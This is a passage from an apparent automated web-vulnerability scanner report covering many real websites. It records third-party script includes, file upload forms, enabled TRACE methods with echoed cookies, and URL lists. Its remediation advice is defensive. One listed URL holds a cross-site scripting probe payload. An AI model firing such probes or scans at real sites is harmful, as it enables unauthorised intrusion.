Path:	/wordpress-plugins/vipers-video-quicktags/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/anywhere.js?id=Re7l0WW7DL2osi0gZCXeg&v=1&ver=1
http://platform.twitter.com/widgets.js
http://stats.wordpress.com/e-201105.js
http://www.google.com/jsapi?ver=3.1-RC3-17376

Request

GET /wordpress-plugins/vipers-video-quicktags/ HTTP/1.1
Host: www.viper007bond.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: PHPSESSID=bbd6c58a551246b940256f97b64adb9b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XRDS-Location: http://www.viper007bond.com/?xrds
X-Yadis-Location: http://www.viper007bond.com/?xrds
X-Pingback: http://www.viper007bond.com/wordpress/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 128283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
</script>
<script type='text/javascript' src='http://www.google.com/jsapi?ver=3.1-RC3-17376'></script>
<script type='text/javascript' src='http://platform.twitter.com/anywhere.js?id=Re7l0WW7DL2osi0gZCXeg&v=1&ver=1'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
...[SNIP]...
<script src="http://stats.wordpress.com/e-201105.js" type="text/javascript"></script>
...[SNIP]...

18.929. http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.virtualtourist.com
Path:	/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Server: Jetty(6.1.14)
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 16:18:16 GMT
Content-Language: en
Connection: close
Set-Cookie: VTT=64.14.197.3.1296663496.485621; Path=/; Domain=.virtualtourist.com
Content-Length: 87089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" language="JavaScript" type="text/javascript"></script>
...[SNIP]...

18.930. http://www.webveteran.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.webveteran.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.webveteran.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.931. http://www.wirelessmicrophone.info/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wirelessmicrophone.info
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm
http://www.statcounter.com/counter/counter.js

Request

GET / HTTP/1.1
Host: www.wirelessmicrophone.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 04:25:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.o
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

18.932. http://www.wirelessprinter.info/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wirelessprinter.info
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A7uutgbcgpj4
http://www.statcounter.com/counter/counter.js

Request

GET / HTTP/1.1
Host: www.wirelessprinter.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:10:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A7uutgbcgpj4"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.933. http://www.wizzsurf.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wizzsurf.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.wizzsurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:39:30 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Connection: close
Content-Type: text/html
Content-Length: 2760

<!doctype html public "-//W3C//DTD HTML 4.0 //EN">
<html>
<head>
<title>Wizz Surf.com | Fast Web Surf | Search Without the Spam | Personal Custom Search</title>
<meta name="keywords" con
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

18.934. http://www.worldmastiffforum.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.worldmastiffforum.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.websitetoolbox.com/cgi/stat/js.cgi?username=acslinda&name=mainpage&domain_conflict=1

Request

GET / HTTP/1.1
Host: www.worldmastiffforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Thu, 03 Feb 2011 04:07:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: hascookies=1; path=/; domain=.worldmastiffforum.com;
Expires: Nov, 8 1991 00:00:01 GMT
Cache-control: no-cache
P3P: CP='NOI DSP COR NID CURa TAIi OUR BUS INT PRE'; policyref='http://www.worldmastiffforum.com/w3c/p3p.xml';
Set-Cookie: newvisit=1296706031; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
Set-Cookie: lastvisit=1296706031; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
Vary: Accept-Encoding
Content-Length: 74225

       <html >
       <head>
       <link rel="alternate" type="application/rss+xml" title="Message Board RSS Feed" href="/external">

           <link rel="alternate" type="application/rss+xml" title="Message Board - -
...[SNIP]...
<body ><script language="JavaScript" type="text/javascript" src="http://www.websitetoolbox.com/cgi/stat/js.cgi?username=acslinda&name=mainpage&domain_conflict=1"> </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.935. http://www.xss.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xss.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://include.reinvigorate.net/re_.js

Request

GET / HTTP/1.1
Host: www.xss.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:07:11 GMT
Server: Apache
Last-Modified: Fri, 23 Jul 2010 07:08:16 GMT
ETag: "88318b73-961-4c493fe0"
Accept-Ranges: bytes
Content-Length: 2401
Connection: close
Content-Type: text/html

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
       <meta name="description" content="
...[SNIP]...
</div>
       <script type="text/javascript" src="http://include.reinvigorate.net/re_.js"></script>
...[SNIP]...

18.936. http://www.xssed.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xssed.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://widgets.twimg.com/j/2/widget.js

Request

GET / HTTP/1.1
Host: www.xssed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:05:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b242bf4d6ea6d76c98637f274c5de537; path=/; HttpOnly
Connection: close
Content-Type: text/html
Content-Length: 11984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<TITLE>XSSed
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<th id="twitter" scope="col">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

19. File upload functionality previous next
There are 4 instances of this issue:

http://translate.google.com/translate_t
http://www.sitesearch.omniture.com/contact/form_support.htm
http://www.threatexpert.com/filescan.aspx
http://www.threatexpert.com/submit.aspx

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

19.1. http://translate.google.com/translate_t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/translate_t

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://translate.google.com/

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

19.2. http://www.sitesearch.omniture.com/contact/form_support.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sitesearch.omniture.com
Path:	/contact/form_support.htm

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.sitesearch.omniture.com/contact/form_support.htm

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /contact/form_support.htm HTTP/1.1
Host: www.sitesearch.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:29:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Length: 4482
Connection: close
Content-Type: text/html

<html xml:lang="en" lang="en">
<head>
   <title>Omniture SiteSearch</title>

   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   <meta name="description" content="Web
...[SNIP]...
<BR><INPUT type="file" name="attach1" value="">
<BR>
...[SNIP]...

19.3. http://www.threatexpert.com/filescan.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/filescan.aspx

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.threatexpert.com/filescan.aspx

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:06:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExpert
...[SNIP]...
<td><input type="file" name="NeatUpload_0CA55798F3938A77CB251946BBD3ECA8-FileUpload" id="FileUpload" style="display:inline-block;width:400px;" />
<span id="RequiredFieldValidator1" style="color:Red;visibility:hidden;">
...[SNIP]...

19.4. http://www.threatexpert.com/submit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/submit.aspx

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.threatexpert.com/submit.aspx

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:06:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
<td style="padding: 5px 5px 5px 5px"><input type="file" name="NeatUpload_E42E63A228669642BED9E9727905DE01-FileUpload" id="FileUpload" style="display:inline-block;width:350px;" />
<span id="RequiredFieldValidator1" style="color:Red;visibility:hidden;">
...[SNIP]...

20. TRACE method is enabled previous next
There are 2 instances of this issue:

http://www.astaro.com/
https://www.astaro.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

20.1. http://www.astaro.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.astaro.com
Cookie: e11fc4cb68c0aab

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 13:55:40 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.astaro.com
Cookie: e11fc4cb68c0aab
X-Forwarded-For: 173.193.214.243
connection: close
X-Varnish: 1753529669

20.2. https://www.astaro.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.astaro.com
Cookie: 5b2d19b397e2b9e4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 13:56:38 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.astaro.com
Cookie: 5b2d19b397e2b9e4

21. Email addresses disclosed previous next
There are 470 instances of this issue:

http://a.cdn.intentmedia.net/javascripts/intent_media_orbitz_ads_fif.js
http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js
https://admin.testandtarget.omniture.com/a
https://admin.testandtarget.omniture.com/errors/browser_unsupported.jsp
http://ads.adbrite.com/adserver/vdi/762701
http://ads.adbrite.com/adserver/vdi/762701
http://ads.adbrite.com/adserver/vdi/762701
http://ads.adbrite.com/adserver/vdi/762701
http://ads.adbrite.com/adserver/vdi/762701
http://ads.adbrite.com/adserver/vdi/762701
http://ads.adbrite.com/adserver/vdi/762701
http://ads.adbrite.com/adserver/vdi/762701
http://ads.adbrite.com/adserver/vdi/762701
http://ads.adbrite.com/adserver/vdi/762701
http://ads.adbrite.com/adserver/vdi/762701
http://ads.adbrite.com/adserver/vdi/762701
https://ads.pof.com/
https://ads.pof.com/Default.aspx
https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176)
https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png
http://ads1.msn.com/library/dap.js
http://ads1.msn.com/library/dapbeta.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.2/controls.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.2/dragdrop.js
http://blekko.com/s/images/wait24trans.gif
http://blekko.com/s/theme19/imgs/plugs/likes_popup2.png
http://blekko.com/s/theme19/imgs/plugs/mobileapp.png
http://blekko.com/ws/
http://blekko.com/ws/+/about
http://blekko.com/ws/+/adsense=4433512740400217
http://blekko.com/ws/+/adsense=4433512740400217+/cwe-79
http://blekko.com/ws/+/adsense=6316080006029695+/cwe-79
http://blekko.com/ws/+/adsense=7542722322890062
http://blekko.com/ws/+/adsense=7542722322890062+/cwe-79
http://blekko.com/ws/+/adsense=7760089209341419
http://blekko.com/ws/+/adsense=7760089209341419+/cwe-79
http://blekko.com/ws/+/adsense=9396229490951644
http://blekko.com/ws/+/adsense=9396229490951644+/cwe-79
http://blekko.com/ws/+/blekkoapp
http://blekko.com/ws/+/blekkojobs
http://blekko.com/ws/+/contact
http://blekko.com/ws/+/faq
http://blekko.com/ws/+/help
http://blekko.com/ws/+/ip=128.83.114.63
http://blekko.com/ws/+/ip=128.83.114.63+/cwe-79
http://blekko.com/ws/+/ip=173.236.153.56
http://blekko.com/ws/+/ip=173.236.153.56+/cwe-79
http://blekko.com/ws/+/ip=174.136.98.194
http://blekko.com/ws/+/ip=174.136.98.194+/cwe-79
http://blekko.com/ws/+/ip=204.9.177.195
http://blekko.com/ws/+/ip=204.9.177.195+/cwe-79
http://blekko.com/ws/+/ip=207.46.19.254
http://blekko.com/ws/+/ip=207.46.19.254+/cwe-79
http://blekko.com/ws/+/ip=207.97.227.239
http://blekko.com/ws/+/ip=207.97.227.239+/cwe-79
http://blekko.com/ws/+/ip=208.80.152.2
http://blekko.com/ws/+/ip=208.80.152.2+/cwe-79
http://blekko.com/ws/+/ip=209.107.213.19
http://blekko.com/ws/+/ip=209.107.213.19+/cwe-79
http://blekko.com/ws/+/ip=216.34.181.96
http://blekko.com/ws/+/ip=216.34.181.96+/cwe-79
http://blekko.com/ws/+/ip=216.48.3.18
http://blekko.com/ws/+/ip=216.48.3.18+/cwe-79
http://blekko.com/ws/+/ip=64.15.79.182
http://blekko.com/ws/+/ip=64.15.79.182+/cwe-79
http://blekko.com/ws/+/ip=65.55.11.162
http://blekko.com/ws/+/ip=65.55.11.162+/cwe-79
http://blekko.com/ws/+/ip=71.41.152.29
http://blekko.com/ws/+/ip=71.41.152.29+/cwe-79
http://blekko.com/ws/+/ip=72.14.213.132
http://blekko.com/ws/+/ip=72.14.213.132+/cwe-79
http://blekko.com/ws/+/ip=72.32.187.73
http://blekko.com/ws/+/ip=72.32.187.73+/cwe-79
http://blekko.com/ws/+/ip=72.32.255.178
http://blekko.com/ws/+/ip=72.32.255.178+/cwe-79
http://blekko.com/ws/+/ip=74.125.19.132
http://blekko.com/ws/+/ip=82.165.200.22+/cwe-79
http://blekko.com/ws/+/ip=82.165.91.243
http://blekko.com/ws/+/ip=82.165.91.243+/cwe-79
http://blekko.com/ws/+/ip=87.230.63.11
http://blekko.com/ws/+/ip=87.230.63.11+/cwe-79
http://blekko.com/ws/+/ip=94.23.150.190
http://blekko.com/ws/+/ip=94.23.150.190+/cwe-79
http://blekko.com/ws/+/press-videos
http://blekko.com/ws/+/privacy
http://blekko.com/ws/+/terms
http://blekko.com/ws/+/topspam
http://blekko.com/ws/+/webmaster
http://blekko.com/ws/+{searchTerms}
http://blekko.com/ws/cure+for+headaches
http://blekko.com/ws/global+warming+/liberal
http://blekko.com/ws/xss
http://blekko.com/ws/xss%20/cwe-79/
http://blekko.com/ws/xss%20cloudscan/
http://blekko.com/ws/xss+/blekko/groundhog-day
http://blekko.com/ws/xss+/cwe-79
http://blekko.com/ws/xss+/cwe-79+/site=acunetix.com
http://blekko.com/ws/xss+/cwe-79+/site=blogs.msdn.com
http://blekko.com/ws/xss+/cwe-79+/site=cgisecurity.com
http://blekko.com/ws/xss+/cwe-79+/site=en.wikipedia.org
http://blekko.com/ws/xss+/cwe-79+/site=f-secure.com
http://blekko.com/ws/xss+/cwe-79+/site=github.com
http://blekko.com/ws/xss+/cwe-79+/site=golem.ph.utexas.edu
http://blekko.com/ws/xss+/cwe-79+/site=googleonlinesecurity.blogspot.com
http://blekko.com/ws/xss+/cwe-79+/site=ha.ckers.org
http://blekko.com/ws/xss+/cwe-79+/site=microsoft.com
http://blekko.com/ws/xss+/cwe-79+/site=owasp.org
http://blekko.com/ws/xss+/cwe-79+/site=praetorianprefect.com
http://blekko.com/ws/xss+/cwe-79+/site=scmagazineus.com
http://blekko.com/ws/xss+/cwe-79+/site=seancoates.com
http://blekko.com/ws/xss+/cwe-79+/site=techmynd.com
http://blekko.com/ws/xss+/cwe-79+/site=thespanner.co.uk
http://blekko.com/ws/xss+/cwe-79+/site=veracode.com
http://blekko.com/ws/xss+/cwe-79+/site=xss-proxy.sourceforge.net
http://blekko.com/ws/xss+/cwe-79+/site=xss.com
http://blekko.com/ws/xss+/cwe-79+/site=xssed.com
http://blekko.com/ws/xss+/date
http://blekko.com/ws/xss+/flickr
http://blekko.com/ws/xss+/foss
http://blekko.com/ws/xss+/it
http://blekko.com/ws/xss+/rank
http://blekko.com/ws/xss+/rss
http://blekko.com/ws/xss+/shop
http://blekko.com/ws/xss+/site=acunetix.com
http://blekko.com/ws/xss+/site=blogs.msdn.com
http://blekko.com/ws/xss+/site=cgisecurity.com
http://blekko.com/ws/xss+/site=en.wikipedia.org
http://blekko.com/ws/xss+/site=f-secure.com
http://blekko.com/ws/xss+/site=github.com
http://blekko.com/ws/xss+/site=golem.ph.utexas.edu
http://blekko.com/ws/xss+/site=googleonlinesecurity.blogspot.com
http://blekko.com/ws/xss+/site=ha.ckers.org
http://blekko.com/ws/xss+/site=microsoft.com
http://blekko.com/ws/xss+/site=owasp.org
http://blekko.com/ws/xss+/site=praetorianprefect.com
http://blekko.com/ws/xss+/site=scmagazineus.com
http://blekko.com/ws/xss+/site=seancoates.com
http://blekko.com/ws/xss+/site=techmynd.com
http://blekko.com/ws/xss+/site=thespanner.co.uk
http://blekko.com/ws/xss+/site=veracode.com
http://blekko.com/ws/xss+/site=xss-proxy.sourceforge.net
http://blekko.com/ws/xss+/site=xss.com
http://blekko.com/ws/xss+/site=xssed.com
http://blekko.com/ws/xss+/techblogs
http://blekko.com/ws/xss+/technology
http://blekko.com/ws/xss+/youtube
http://blekko.com/ws/xss+clouds+can
http://blekko.com/ws/xss+cloudscan
http://blekko.com/ws/xss+cloudscan+/blekko/groundhog-day
http://blekko.com/ws/xss+cloudscan+/date
http://blekko.com/ws/xss+cloudscan+/rank
http://blekko.com/ws/xss+cloudscan+/rss
http://blekko.com/ws/xss+cloudscan+/shop
http://blekko.com/ws/xss+cloudscan+/site=
http://blekko.com/ws/xss+cloudscan+/site=cloudscan.blogspot.com
http://blekko.com/ws/xss+cloudscan+/youtube
http://blekko.com/ws/xss/
https://blekko.com/join
https://blekko.com/login
https://blekko.com/s/images/wait24trans.gif
https://blekko.com/ws/+/privacy
https://blekko.com/ws/+/terms
http://boardreader.com/affiliate/gagbanner.html
http://boardreader.com/info/policy.htm
http://boardreader.com/info/submit.htm
http://boardreader.com/js/dyn/b78df7b9a5de6ff283b7cf94ec615217.js
http://boardreader.com/opensearch.xml
http://clickaider.com/
http://code.google.com/p/swfobject/
https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js
http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz
http://dean.edwards.name/weblog/2006/06/again/
http://developers.facebook.com/devgarage
http://developers.facebook.com/docs/opengraph
http://dillerdesign.com/experiment/DD_belatedPNG/
http://editorial.autos.msn.com/blogs/autosblog.aspx
http://erncpa.com/
https://faq.orbitz.com/app/answers/detail/a_id/15644
http://feeds.feedburner.com/omniture/blogs/all
http://forums.plentyoffish.com/datingposts6866122.aspx
http://gocitykids.parentsconnect.com/data/service-calendar.json
http://golem.ph.utexas.edu/~distler/blog/atom10.xml
http://groups.google.com/groups
http://gsgd.co.uk/sandbox/jquery/easing/
http://ie6funeral.com/
http://johannburkard.de/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html
